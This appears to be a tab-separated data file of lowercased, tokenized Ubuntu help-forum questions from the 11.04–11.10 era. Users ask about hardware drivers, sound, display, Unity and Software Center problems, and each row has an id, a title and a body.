70507	drag and drop file to existing vlc player	whenever i try to drag and drop a file to an existing vlc player ( as per drag & drop files and items in unity ! ) , it seems to open a new vlc window and start playing from there . is it possible to run it from the existing open window ?
70508	how do i enable multitouch on a dell inspiron 15r ?	i installed ubuntu 11.10 on dell inspiron 15r , but the touchpad ( manufactured by alps ) is recognized as a normal mouse , so it wo n't let me do multi-touch gestures such as scroll and zoom as windows does . i tried to install synaptics touchpad following this post : https : //help.ubuntu.com/community/synapticstouchpad but it does n't work for me . i copied the following from my installation process : shuoshen @ shuoshen-inspiron-n5110 : ~/downloads $ sudo dpkg -i synaptics-dkms_1.1.1_all.deb [ sudo ] password for shuoshen : ( reading database ... 164789 files and directories currently installed . ) preparing to replace synaptics-dkms 1.1.1 ( using synaptics-dkms_1.1.1_all.deb ) ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 1.1.1 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . unpacking replacement synaptics-dkms ... removing old module source ... setting up synaptics-dkms ( 1.1.1 ) ... loading new synaptics-1.1.1 dkms files ... loading tarball for synaptics-1.1.1 dkms : ldtarball completed . creating symlink /var/lib/dkms/synaptics/1.1.1/source - > /usr/src/synaptics-1.1.1 dkms : add completed . installing prebuilt kernel module binaries ( if any ) building module ... kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... .. make kernelrelease=3.0.0-12-generic -c /lib/modules/3.0.0-12-generic/build subdirs=/var/lib/dkms/synaptics/1.1.1/build modules ... .. ( bad exit status : 2 ) error ( dkms apport ) : binary package for synaptics : 1.1.1 not found error ! bad return status for module build on kernel : 3.0.0-12-generic ( x86_64 ) consult /var/lib/dkms/synaptics/1.1.1/build/make.log for more information . dpkg : error processing synaptics-dkms ( -- install ) : subprocess installed post-installation script returned error exit status 10 errors were encountered while processing : synaptics-dkms how can i enable multi-touch ?
70509	nvidia 525 disabling using ironhide	i have installed ironhide using ppa [ 11.10 - 32 bit , dell xps 15 ] . after rebooting i tried to disable nvidia gpu using the command `` sudo ironhide-disablecard '' . i got message as `` error : no module for nvidia found at /proc/modules '' and `` nvidia card disabled successfully '' . is it a normal behavior ? please note i tried disabling the card without trying to enable it . thank you
70513	how do i import songs from another partition with rhythmbox ?	i currently have songs on another linux partition that i have mounted . in ubuntu 11.04 , classic version , i can import music folder with rhythmbox from other partitions with no issues . after upgrading to 11.10 and clicking on import folder from rhythmbox , i can browse to the songs from the other partition but they are all greyed out . if i browse to that partition with the regular file browser , the songs plays fine . is there a way to allow rhythmbox to import songs from other partitions in 11.10 ?
70514	help with my basic partitions	download ubuntu , and my partitions became basic to dynamic ? my operating system windows 7 : died , and i was trying to fix this problem , i have working files need corel draw , and i have much experience in this , as i can see my partitions `` unreadable '' ? as i can restore without losing my data sorry for my bad english
70518	how do i remove that envelope icon from the menu bar ?	is there a way to remove that envelope icon from the menu bar ? it 's around the top right corner . it contains chat , evolution , broadcast , pidgin , ...
70522	ubuntu shows debian logo and crashes on boot	i installed ubuntu 11.10 today and used it for a few hours . i restarted the computer and in the screen where you chose the kernel version , the screen is not the ubuntu purple screen anymore - it shows the debian logo and when you hit enter it does n't start . i tried a fresh reinstall but it happened again . i beg for help , i 'm using windows to post this ( shame on me )
70528	which one is good traffic shapping / traffic monitoring ?	i am new in ubuntu guys , which software should i use as traffic shapping in ubuntu ? i use cfosspeed in windows to monitoring my bandwidth . i 've try search in the askbuntu.com but it answered , but too old aplication there , it 's no uupdate since 2002 and it stopped in alpha version .
70532	no active connections found ! ubuntu 11.10	i upgraded from 11.04 to 11.10 , and that was working fine for days . then i responded to a notification that there were software updates for 47 packages . i ran software update and the next time i rebooted , i no longer had network access ! i plugged in an external usb drive with centos 5 live cd on it and the dell hardware works correctly , both seeing networks and accessing the internet from centos . pc : dell gx-260 running lshw under ubuntu 11.10 shows that it finds : description : ethernet interface product : intel 82540oem gigabit ethernet controller vendor : intel corporation please help me resolve my ubuntu networking issue ( s ) . this pc has been offline for days ! thank you in advance for any and all help , guys and gals ! johne1
70534	difference between `` su '' , `` sudo -s '' , `` sudo -i ''	i already read it from manual but i ca n't see difference.. su - change user id or become superuser sudo -s [ command ] the -s ( shell ) option runs the shell specified by the shell environment variable if it is set or the shell as specified in passwd ( 5 ) . if a command is specified , it is passed to the shell for execution . otherwise , an interactive shell is executed . sudo -i disappear description in manual
70540	how can i set default terminal used in unity ?	how can i set the default terminal used in unity ? i would like to use the ctrl+alt+t hotkey to start a non-default terminal . the default terminal is gnome-terminal . where can i change the default terminal value ?
70546	mount and share usb disk on ubuntu server 10.04	i 've just installed and configured a house server with ubuntu 10.04 ( lts ) . everything works fine , but i have a problem : i want to connect and share with samba a usb disk formatted in ext4 . i tried to mount the unit but i could n't do it . i want to have mount this unit all the time , so if i reboot the server i can still access to the unit . i have samba installed and working thanks .
70547	html5 videos from youtube are n't loading in google chrome	when i go on to youtube and join the html5 trial the videos no longer load . they show the 'loading ' circle and stay black . when i use flash instead on linux the videos load . when i use google chrome on windows 7 with html5 there 's no problem .
70548	getting the error error : brokencount > 0 after installing the packages	i am getting the following error in the top menu bar : '' an error occurred.please run the package manger form the right-click menu or apt-get in a terminal to see what is wrong.the error message was : 'error : brokencount > 0'.this usually means that your installed packages have unmet dependencies . ''
70552	ca n't adjust brightness on my msi vr420 laptop	using every method possible i 'm unable to change my laptop brightness.. it 's stuck on super max brightness.. using the slider in the `` screens '' window int he control panel doesnt do anything , and using the fn keys does n't do anything ... some info about my system : laptop is a msi vr420 running ubuntu 11.10 video card is an integrated intel card used to work when i ran ubuntu 10.10 and earlier versions ( not sure if it worked out of the box or if i inadvertly fixed it in previous versions while installing lots of other packages ) brightness slider on the `` screen '' window does n't do anything , `` dim when on battery -power '' doesnt do anything when i use the fn+f4/f5 keys to adjust brightness there is a popup showing that its receving the input , but i can only go from between 0 brightness and max brightness.. ( that is what the output is showing , the brightness does not change though ) when attempting to change the brightness with fn+f4/f5 my dmesg log reports `` acpi : failed to switch the brightness '' here are some outputs from some terminal commands , not sure if any of this is useful or not.. lspci - http : //pastebin.com/eimzsgs3 ls /sys/class/backlight/*/brightness will output : /sys/class/backlight/intel_backlight/brightness cat /sys/class/backlight/intel_backlight/brightness = > 0 ( when i use the fn+f4/f5 ) this will change betwene 0 and , but the actual brightness does n't change ) cat /sys/class/backlight/intel_backlight/max_brightness = > 1 lsmod | grep ^i915 = > i915 505108 3 here is the list of things i 've tried through searching google ... .. edit /etc/default/grub âś grub_cmdline_linux_default : acpi_osi=linux , acpi_backlight=vendor , nomodeset . ( as well as several different combinations of these settings being on or off ) edit /etc/x11/xorg.conf ( file does n't exist on my system ) edit /proc/acpi/video/vga/lcd/brightness ( file does n't exist ) sudo setpci -s 00:02.0 f4.b=xx ( does nothing ) xbacklight -set xx ( does nothing ) i 've tried about everything with no luck ... the only thing i have n't tried is adding the ppa that someone suggested here : unable to change brightness in a lenovo laptop ... . however according to the notes on the ppa.. all of the changes that are in the ppa are now actually apart of 11.10 and the ppa is only for people with 11.04.. does anyone have any ideas for me ? edit : by setting acpi=off in my /etc/default/grub file i was about to get my fn+f4/f5 keys to work , also `` dim when display to save power '' now makes my laptop dim when on battery power.. the dimness slider however still does n't do anything.. also xbacklight does n't do anything stil or any of the other methods ... the thing i do n't get is why setting acpi=off makes my fn+f4/f5 keys work ? is n't acpi supposed to be enables the backlight to be dimmed ? does anyone know what ubuntu is deciding to do behind the scenes when acpi=off ? does anyone know what/if any features i might be losing with it off ?
70553	software center not downloading	i just made a fresh install of ubuntu 11.10 . i have a working internet connection , and can browse with firefox . but when i try to download things in software center , it says failed to download package files check your internet connection . and requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . the `` details '' are : docbook-xsl dvipng icoutils imagemagick kate-data katepart kde-runtime kde-runtime-data kdebase-runtime kdelibs-bin kdelibs5-data kdelibs5-plugins kdoctools kile konsole kubuntu-debug-installer lacheck latex-beamer latex-xcolor libattica0 libcdt4 libclucene0ldbl libdlrestrictions1 libencode-locale-perl libfile-listing-perl libfont-afm-perl libgraph4 libgvc5 libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libilmbase6 libio-socket-ssl-perl libiodbc2 libkatepartinterfaces4 libkcmutils4 libkde3support4 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 liblqr-1-0 liblwp-mediatypes-perl liblwp-protocol-https-perl libmagickcore3 libmagickcore3-extra libmagickwand3 libmailtools-perl libnepomuk4 libnepomukquery4a libnepomukutils4 libnet-http-perl libnet-ssleay-perl libnetpbm10 libntrack-qt4-1 libntrack0 libopenexr6 libpathplan4 libphonon4 libplasma3 libpolkit-qt-1-1 libqapt-runtime libqapt1 libqca2 libqt4-designer libqt4-qt3support libqtwebkit4 libsolid4 libsoprano4 libssh-4 libstreamanalyzer0 libstreams0 libthreadweaver4 libtimedate-perl liburi-perl libvirtodbc0 libwww-perl libwww-robotrules-perl libxml2-utils libxss1 lmodern luatex netpbm ntrack-module-libnl-0 odbcinst odbcinst1debian2 oxygen-icon-theme pgf phonon phonon-backend-gstreamer plasma-scriptengine-javascript prosper ps2eps psutils qapt-batch shared-desktop-ontologies soprano-daemon tex-common texlive texlive-base texlive-binaries texlive-common texlive-doc-base texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-recommended texlive-latex-base texlive-latex-base-doc texlive-latex-recommended texlive-latex-recommended-doc texlive-luatex texlive-pstricks texlive-pstricks-doc tipa virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common if i run sudo apt-get update i get a bunch of `` hits '' , followed by the errors : hits ... ... ign http : //us.archive.ubuntu.com oneiric-backports/universe translation-en_us ign http : //us.archive.ubuntu.com oneiric-backports/universe translation-en fetched 864 b in 4s ( 198 b/s ) reading package lists ... done w : gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //security.ubuntu.com oneiric-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //us.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //us.archive.ubuntu.com oneiric-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //us.archive.ubuntu.com oneiric-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/release w : some index files failed to download . they have been ignored , or old ones used instead . anyone know what 's going on ?
70555	ubuntu gets stuck on desktop screen ?	i have an acer aspire one , running ubuntu 11.10 i recently installed ubuntu , because my windows xp was real buggy . i came across this problem , where once i reboot and login , i can not see anything , not even the launcher ! i reinstalled ubuntu and it started working fine . after some experimenting , it seemed that if i do n't logout and shutdown , this happens . has anyone encountered this problem ? please help me , thanks !
70556	how do i forward sound from one computer to another over the lan ?	i have two computers . computer a is running ubuntu 11.10 with gnome clasic . computer b is running mythbuntu 11.10 . computer b has a sweet digital audio sound system . i want to play music from banshee on computer a , but have the sound output sent over the lan and come out on computer b 's speakers . i found this question which indicated i should use something called `` paprefs '' to acheive this . so , i installed paprefs and then in the `` network server '' dialog , i selected these settings : and then ... i have no idea what is supposed to happen . i checked the paprefs home page , and all they say under documentation is `` there is not much to say . just run paprefs and see for yourself . '' i do n't see anything happening or any way i 'm supposed to make the connection from computer a to computer b . how is this supposed to work ? can someone provide clear instructions on what one does to actually make the connection ? ideally , the hope is that i can have a set up that allows me to always play certain applications , like banshee , over the lan using computer b 's sound system . in other words , once set up , it is the default , and does not have to be manually reconnected every time .
70558	ssh hangs for ~15 seconds before connecting	if i directly connect to server a , using public key auth from my computer , it takes < 0.5 s. but if run the same ssh command from server b ( to connect to server a ) it freezes for about 15 s at the following line : ( complete log ) debug2 : ssh_connect : needpriv 0 since i can ssh normally , i assume it is a configuration issue in server b . also , i 've tried sshing from b to a , using another account ( with password auth ) . it too hangs at the same line for the same amount . this leads me to believe that it is system ssh config issue , so i 'm posting my /etc/ssh/ssh_config as well . i ran a diff of my ssh_config vs server b 's . the result gave no dissimilarities . both server a and b are running lucid .
70560	why am i getting this `` connection to pulseaudio failed '' error ?	i have a computer that runs mythbuntu 12.04 . it has an external usb kenwood digital audio device . when i open up pavucontrol , i get this message : if i do as the message suggests and run start-pulseaudio-x11 , i get this output : $ start-pulseaudio-x11 connection failure : connection refused pa_context_connect ( ) failed : connection refused error log file , created with these intructions , on pastebin . how do i correct this error ?
70569	how do i limit the number of open torrents in transmission ?	i want to limit the number of torrents that are simultaneously being downloaded in transmission . i could find any such option in transmission preferences . how can i do this ?
70572	reset unity and gnome to default values	apparently i 've messed up a lot with my unity and gnome 3 settings and now my system looks ugly , and even if i made changes ( using gnome-tweak-tool for example ) to my configuration nothing seems to work . can you guys tell me how to delete all the unity and gnome related settings ( like also compiz and all other similar ones ) and restart with the settings of an installation from scratch ? ? i 'd really appreciate your help , thanks a lot guys !
70577	why do numbers appear over open and/or pinned apps when i hold down super ?	when i hold down the super ( windows ) key , numbers and in some cases letters appear over open apps and other unity things ( workspace switcher , trash ) . the first 10 open or pinned apps are numbered 1 , 2 , 3.. ..8 , 9 , 0 . subsequent apps are not numbered . what are the numbers/letters for ?
70587	kazam & ubuntu 11.10	i 'm trying to install kazam in my new ubuntu 11.10 ( 64 bits version ) with gnome shell and ... nope . gtk-recordmydesktop does not work in gnome shell too . i 'd like using kazam and i do n't really know how to do it . any idea will be appreciated . regards . : )
70594	software-center process do not quit when i close software center	i use ubuntu 11.04 amd64 arch . when i close software center , i find software-center process do not be killed . then i start software center the second time , it will take a little long time to open . how to do with it ? thanks
70596	update the list of default applications	how can i have unity in ubuntu 11.10 to remove the names of deinstalled applications from the list of default applications ? i have removed all internet browser applications with software center . they dont disappear from the list of default applications in system information . in unity in ubuntu 11.10 there is a bottom for shutdown on the upper menuebar . there you can find system settings . inside that system settings menue there is an icon `` system information '' , where you can find default applications . application names dont disappear , when you deinstall an application . how can i let this names disappeare ?
70599	how to change tooltip background color in unity ?	in a lot of applications the tooltips are just plain ugly ( white text on black background , way too much contrast ) or even unreadable ( black or dark blue text ( hyperlinks ) on black background ) . i want to change the background color of the tooltips to some medium gray or even some yellow or something like that , maybe even something semi-transparent . here is a screenshot of eclipse which displays some source code in a tool tip with black text on black background : switching to a different theme ( something other than ambiance or radiance ) helps but i like ambiance and i want to keep it . it 's just this darn tooltip color which is absolutely unacceptable . i found several solutions for older ubuntu versions but they no longer work with unity in ubuntu 11.10 because i ca n't find any function to customize the ambiance or radiance theme . so how do i do that in the current ubuntu version ?
70600	acer aspire reports 432mb ram but has 1gb installed	my acer aspire has 1gb ram ( 2x512mb ) when running ubuntu 11.10 , it only reports having 432mb . this would be corect if i was only using 512mb of ram . before the upgrade , it showed the correct amount of memory and performed much faster
70606	how to enable sub pixel hinting ?	fonts are displayed a little bit blurry on my tft screen . i fixed this in previous ubuntu releases by enabling sub pixel hinting in the font settings . but now i ca n't find any font settings dialog in unity . how can i enable sub pixel hinting or change the font family or font size ? where is all this stuff ?
70609	how to boot into ubuntu from grub prompt ?	i know there is a lot of documentation about grub and grub2 here and around the internet , but nothing seems to solve my problem . i upgrade from ubuntu 11.04 to 11.10 during its beta stage , and everything was working great ! but suddenly lightdm started acting up , when i would type my password to log in the screen would flash and bring me straight back to lightdm . then one day i booted to a message similar to `` gnu grub version 1.99 ubuntu . minimal bash-like editing is supported . type help for complete list . '' i reasoned i messed things up , thus i took a live cd to simply copy all my files to an external hard drive so i could reinstall ubuntu . but when i go to my home folder the only folder there is a folder called boot/grub/etc . how can i get all my data back ? thats all i 'm concerned about , not so much about reviving ubuntu , i will simply reinstall it . thank you !
70614	any way to exclude accounts from mail indicator ?	i only want one of my accounts to make the mail indicator go blue when i get a new message , but i do n't want it monitoring the second account i also have in thunderbird . possible ?
70625	is there a way to save a gnome-shell session ?	i am running gnome-shell 3.2 on ubuntu 11.10 is there a way of 'saving a session ' in gnome shell - so that all the running applications are restored the next time i login ? i will ideally like to have a choice of saving the session or skipping it every time i log out . thanks in advance .
70633	how to disable screen dimming after inactivity when this is already disabled at system settings ?	when my dell vostro laptop is connected to the power , the screen is dimmed after 10 seconds . this is very annoying . when my laptop is running on the battery , the screen is not dimmed after inactivity , this is what i want . when i go to system settings â screen , the dim screen to disable power option is disabled . how can i disable screen dimming after inactivity totally ? i 'm running 11.10 . when i create a new user account i do n't have this problem . i have changed some settings with compizconfig settings manager and with gconf , but i ca n't find timeout options for brightness .
70638	how can i enroll in the ubuntu software centre on behalf of my company ?	the faq says i `` can enroll as an individual or on behalf of your company '' but i did n't find any field where i can indicate that i want to enroll on behalf of my company . how can i do that ?
70642	3d nouveau drivers package	on 11.04 , the package for providing open-source 3d acceleration on nvidia cards was called libgl1-mesa-dri-experimental . what is the oneiric equivalent of such a package ?
70643	intel gma 950 missing driver for an eee pc 1008ha	system info shows graphics unknown so i guess the slow response problem in unity is due to that . is there any way to get some drivers to my card ? i have a gma 950 graphics card and my computer is a eeepc 1008ha . same on dell mini 9 .
70645	how is tax handled for purchases from the ubuntu software centre ?	i 've just created an account to submit an application to the ubuntu software centre and the agreement says : `` you are responsible for determining applicable taxes in connection with distributing your app , and you shall pay applicable taxes to the applicable tax authorities. '' . does this mean that canonical does n't collect tax ( especially vat in the eu ) and it 's my responsibility to do it ? also , am i wrong to assume that the price listed by the usc is the same for both people who pay taxes and for those who do n't need to pay them ?
70650	ubuntu one payments	i 've been a paying user of ubuntu one for quite a while now and am more than happy with it . however i recently switched banks and my new one is charging an international fee because the money is being requested in euros . i can move payment back to my old bank for a while , but was wondering if there are any short term plans to allow payment in local currencies or to allow payment using something like paypal ?
70651	will ubuntu software center add support for generating dynamic license keys ?	it looks like the ubuntu software centre can only work with static license keys . will it also support dynamic license keys based order details ( name , date , email , etc ) ?
70652	what video driver should i install for nvidia corporation g96 [ geforce 9400 gt ] ?	i have a nvidia video card to enable all the compiz effects . my ubuntu 11.10 gets slow at times or will froze . suggestions . which one : nvidia-173 nvidia-96 nvidia-common nvidia-current nvidia-va-driver here , the data of my card : ubuntu 11.10 01:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9400 gt ] ( rev a1 )
70656	how do i log the name of the process that caused an outgoing internet connection attempt ?	if i enable ufw to block outgoing internet connections and set logging to `` low , '' the log report that appears at /var/log only lists the pid of the application involved , not the application 's name . the pid is useless information in a log because the pid does not live past a session . and when i view the log , i 'm always looking at past sessions . so how can i make the log file record the name of the process that caused an outgoing internet connection attempt ?
70658	location of the `` more apps '' icon	can someone help me find the location of the `` more apps '' icon ? it 's the icon that you click on in the dash home button to bring up the search applications screen . when you click on the dash home button you 'll the button/icon `` more apps '' . i have created a routine to allow me to click on an icon on the launcher to bring up the `` search applications '' screen , but at present it just has a question mark `` ? '' for the icon . thanks in advance for any help in facilitating me with access to this specific icon !
70659	how to access hard disks in gnome ?	i have just installed 11.10 with gnome . now it seems i can not access my secondary hard disks anymore . is there a way to access non-system hard disk in gnome ?
70660	hardware accelerated flash player ?	according to adobe statements they gave up support for hardware acceleration in newest flash player for linux : ( is there any other dev/alpha/beta version of flash player which enables hardware acceleration in ubuntu 11.10 ?
70661	how do we add dns servers to our vpn network definitions ?	i just set up a vpn connection to my workplace , but it fail s to connect . our protocol for setting up vpn on windows clients requires we specify dns servers that are inside our corporate network . i can not find the way to do this on ubuntu f.or the vpn connection i have set up .
70664	is cursor feedback gone for good ?	back in 11.04 and before , whenever i clicked on an app icon , i would get the spinning wheel if the app did n't load immediately . in 11.10 , after clicking on an app from the launcher , there 's no feedback which tells me that i have clicked on the icon . mac os x , for example , handles this by bouncing the icon , so that you know the app is launching . is cursor feedback a thing of the past in 11.10 ?
70666	can i still right click on an app to move it to the left or right workspace like in 11.04 and before ? what about one click switcher ?	in 11.04 ( classic edition ) and before , one of the best features of ubuntu was the workspace switcher , none of the other major os had something like that built natively . i work with 2 workspaces , one left and the other right . i will right click apps from left workspace and throw them to the right and vice versa . in 11.10 , i have to : open workspace from the launcher drag the app to the other workspace double click back on my original workspace what used to take 2 clicks , now takes 1 click , 1 double click and a drag . is that the modern way to switch apps between workspaces ? in older ubuntu , i had the 2 workspace icons at the bottom right corner of my screen . i can then single click on the left or right workspace for switching . i 'm now doing step 1 and 3 from above to perform that single . are there any shortcuts or customization to reduce the number of events i have to go through to perform those simple actions ?
70667	how to upgrade firefox in ubuntu 10.04 lts	how to update firefox in ubuntu 10.04 lts to firefox 7
70673	can not preform ftp uploads , `` connection timed out ''	in a fresh copy of 11.10 , i ca n't upload files using ftp to a server , while i can with sftp . is ftp upload ( i.e. , outgoing transfer ) disabled by default ? i can log in to the ftp server and , but ca n't upload files . if it is disallowed by default , how can i enable it ? added : if i use filezilla , everything works good . however , if i use ftp command i obtain the following error : 200 port command successful 425 could not open data connection to port 38505 : connection timed out however , with sftp command , it works .
70674	fusion-icon does not show up in system tray	i ca n't find a solution for my problem online : i 'm running unity 2d in ubuntu 11.10 and want to enable compiz effects . i installed compiz config settings manager , and fusion-icon , but when i start fusion-icon nothing happens . when i execute it from terminal it stucks at lines like `` setting update 'command ' '' or `` setting update 'next_key ' '' i already set the whitelist for the panel to 'all ' . anyone knows what i 'm missing ? thanks in advance !
70675	gedit problem with color of selected text	i have a weird problem here using gedit . it 's gedit 3.2 in ubuntu 11.10 . when i select some piece of text , this should be white text on orange background ( unity 11.10 default ) . suddenly it started acting different : when i select text , it is white text on actual background color ( white on black , for instance ) . i do n't know if it 's related to gedit or unity , but sice ubuntu 11.10 i can change only default font and theme in `` edit - > preferences - > fonts & colors '' . no other `` tweakable '' option is available . the problem occurs no matter what theme i chose . i have no idea why this happens and how to solve this . has anyone seen something similar ?
70678	gnome classic loading instead of gnome 3	after updating ati drivers my gnome 3 interface is gone . gnome classic is loading instead . ubuntu 11.10 unity along with gnome 3 ( however unity went missing from the selection menu on login screen ) . any help would be apreciated
70682	how can i force banshee to organize my music folder ?	i recovered my music collection from my ipod after i lost a hard drive , via drag and drop from banshee to my music directory . banshee started organizing the files according to tags after finishing the copy-process , but stopped after about 10 % of my collection . how can i force it to continue ? restarting banshee and disabling and enabling the 'update files ' option did n't help . thanks : - )
70686	toshiba satellite keyboard not working correctly	the first letter in the alphabet a is not working on my keyboard . i 'm also noticing that the num lock light flashes with every keystroke of any letter as i type . i re-installed an older version of ubuntu and it works again so it is the 11.10 release of ubuntu . how can i fix this ? model is toshiba satellite l655d-s5076rd
70689	is there an alternative to mail-notification which supports hotmail ?	i need a notification applet/daemon for gnome shell ( on 11.10 ) that supports both gmail and hotmail . i tried mail-notification which is supposed to work with hotmail , but i get an error and only gmail works properly ; i also tried mailnag but it does not seem to run at all . are there any viable alternatives ? i know there are some firefox extensions that can do this but i use a different browser . thanks for your suggestions !
70691	where can i find unity 's log files ?	since i upgraded to oneiric , the top left unity menu button is missing , fonts look a bit weird ( font size changed ) and the login screen looks like the one from natty , except with a gtk1-like gray theme . apart from that , everything ( e.g . the unity launcher bar ) looks kind of okay . i have no idea how to pinpoint the problem , are there any log files i should check ? xorg.0.log does n't contain any errors . i have a lenovo t410 with a nvidia graphics card and the proprietary driver is installed . hardware acceleration works fine .
70694	how to change color/transparency of all desktop panels ?	in kde 4.7 , after making some personalization i made a layout which i really like . but light panels color breaking the whole idea . it is too bright . changing color scheme does n't help . how could i make panels darker ? p.s . : panels i 'm talking about are ( sorry , translated from my native language ) : default panel folder `` look '' ( or smth like that ) system tray digital clock widget launch panel
70695	acer aspire one aoa150 netbook	after i installed the 11.10 version my wifi card recognizes all available networks . however after i put in the right password it tries to connect and reconnect etc . i didn t have any issues with previous ubuntu versions . anyone got around this problem ? it seems it has something definately to do with the new 11.10 version
70696	can i upgrade to linux 3 kernel on ubuntu 10.10 ?	i need to use linux 3 , becasue with linux 2.6.x has display problems with my sandybridge integrated graphic . on the other hand , i need to downgrade to ubuntu 10.04/10 because betavine packages for running my mobile broadband modem work only with ubuntu 10.04 ( and 10.10 ) . hence i need to make a compromise . i appreciate your hints .
70703	how do i install turbo pascal ?	i 'm reading this tutorial . i need a turbo pascal , can anyone say me how to install turbo pascal in ubuntu 10.04 ? thanks in advance .
70709	how do i restore my account after upgrade to 11.10	i upgraded my ubuntu os from 11.04 to 11.10 a few days ago . during this process the update manager alerted me that it encountered some errors , and suggested i send a bug report . i tried to send it , but somehow there was n't an internet connection anymore so i could n't send it after all . after i rebooted , the login screen seemed to be okay , but the second time i logged in to my account and ever since i only see the desktop background without any panels . i ca n't add a screenshot but basically on top of the desktop image it shows all the options of nautilus ( bookmarks , edit , ... ) it has to be something specificaly wrong this account , because when i open the guest account , it has everything there . is there any way to solve this ? thank you
70711	unable to delete faulty xorg.conf	i upgraded to 11.10 . unfortunately , this upgrade overwrote a previous configuration file for my monitor , resulting in the `` out of range '' error on the monitor . ( it is an old lcd screen and i need 800x600_60.0hz . ) i plugged in an old crt monitor to work on it . not having a backup of the configuration file , i researched again how to do it . involved xrandr and creating a new configuration . i tested this and it worked , so i wrote these settings to a xorg.conf file in /etc/x11/ and rebooted . boot started , then the screen went blank , no sync . i do n't know if the boot continued or got stuck , as the screen is blank . so , figuring it is a faulty xorg.conf , i rebooted to recovery mode and tried to delete or edit the file . i can not edit it - file system is read only . i can not delete it - file system is read only . i can not change the permissions with chmod - file system is read only . i ca n't do anything with it ! so , i booted with a livecd , and also can not edit or delete it as i am not the owner . from livecd i then thought i 'd copy the files off that i want and reinstall . but i can not read all the folders on the desktop - not being the owner of them all ( strange ) . what now ? ! how can i : - delete xorg.conf - make filesystem writeable in order to delete or edit xorg.conf - once that problem is solved , i am back at square one and need to get the right configuration for the monitor - where do i do that . i 'm not a complete novice at linux , but not overly familiar ... any help gratefully received !
70712	how can i speed up the software center ?	the software center in 11.10 is much slower than it was in natty , and on my five years old machine it often becomes unresponsive . what can i do to make it run faster ?
70713	how do i switch which display is primary ?	ever since i connected my hdtv to my ubuntu system , ubuntu has wanted to use it as the primary display . i thought i had this fixed up through 11.04 , but i do not remember how , and now with 11.10 the login box is showing up on the hdtv again . this is a problem for me because normally the hdtv is ( a ) set to a different input source and ( b ) turned off . now i have to turn it on and change the input source every time i want to log in or launch an application . how can i configure 11.10 to use the correct monitor as the primary ? thank you .
70717	rebuilding a newer version of a deb package	what 's the best way to update ( through rebuild from source ) a debian/ubuntu-package to a more recent version ? should i be using apt source in all cases including when i want to publish it as personal package archive ? i would like to have intel tbb 4.0 instead of 3.0 , which is pre-packaged in ubuntu 11.10 . so how do i use an existing apt source tar-ball and modify it to support the new version ? is there some nice tutorial listing what debian package specific files i should modify ?
70718	problem with quicktime dmuxer in totem player ( .mp4 and .mov files )	i am using ubuntu 11.10 and install ubuntu-restricted-extras but totem player still unable to play .mp4 and .mov files it also search for suitable plugins and no packages found . vlc media player can play these files but i want totem too .
70720	how can i assign win-e to open my home folder ?	in 11.10 , i want to customize keyboard shortcuts . especially , i want to assign win+e for opening the home folder with nautilus . ( if i can open a specific folder other than the home folder , it is better . ) i opened the keyboard setting , and i see the following window : what do all these mean ? i have a shortcut for home folder with the key stroke explorer . what is explorer ? how can i customize ? if i want to assign a shortcut for opening a directory ( say , document directory ) with nautilus , what should i do ?
70724	how to set fn+f2 to show battery 's status throug osd and not power statistics ?	in natty pressing fn+f2 on my samsung nc10 opened a new notification with the remaining battery power . after upgrading to oneiric , it opens the power statistics . is the a way to revert this change ? checking the battery status with the notification is much faster than finding it from the power statistics . i know that the remaining battery time can be set to be shown on the panel but i 'm used to fn+f2 .
70725	sound does n't work on a dell vostro 3400 , shows up as unclaimed	i have no sound since installing ubuntu 11.10 on my dell vostro 3400 . it looks like the hdmi sound card is found , but not the card that would make sound come out of my speakers . this is what appears to be the relevant output from lshw : *-multimedia unclaimed description : audio device product : 5 series/3400 series chipset high definition audio vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 06 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : fbe00000-fbe03fff it is funny as the sound `` just worked '' with fedora 13-15 , but not with ubuntu 11.10 out of the box . any help would be greatly appreciated .
70727	`` no parking '' sign in the middle of the screen	i 've just installed ubuntu 11.10 , and an annoying no parking sign does n't stop to appear and disappear in the middle of the screen all the time , totally randomly ! it was on the live-cd during the installation , too . what does it mean ? how can i disable it ?
70732	how do i get back the login sound ? ( playing in guest account though ! )	my ubuntu 11.10 was having login sound after i installed it . but , after few days , the sound is not playing ! however , the sound is heard when logged on using guest account , the sound is being played ! i could not hear the sound on administrator account .
70735	nautilus losing theme	i 'm new to ubuntu , i install it yesterday and i 'm loving the system . but there is a problem with nautilus and i have no idea on how to fix this . nautilus randomly loses its ambiance theme , becoming all gray with a strange look , the icons also disappear too : doing a logoff or rebooting the system fixes the problem , but it happens again after a while , it seems completely random and it 's quite annoying . the ubuntu version is 11.10 64 bits . i will be very grateful if someone help me fix this . this is not desktop forgets theme ? as it only affects nautilus .
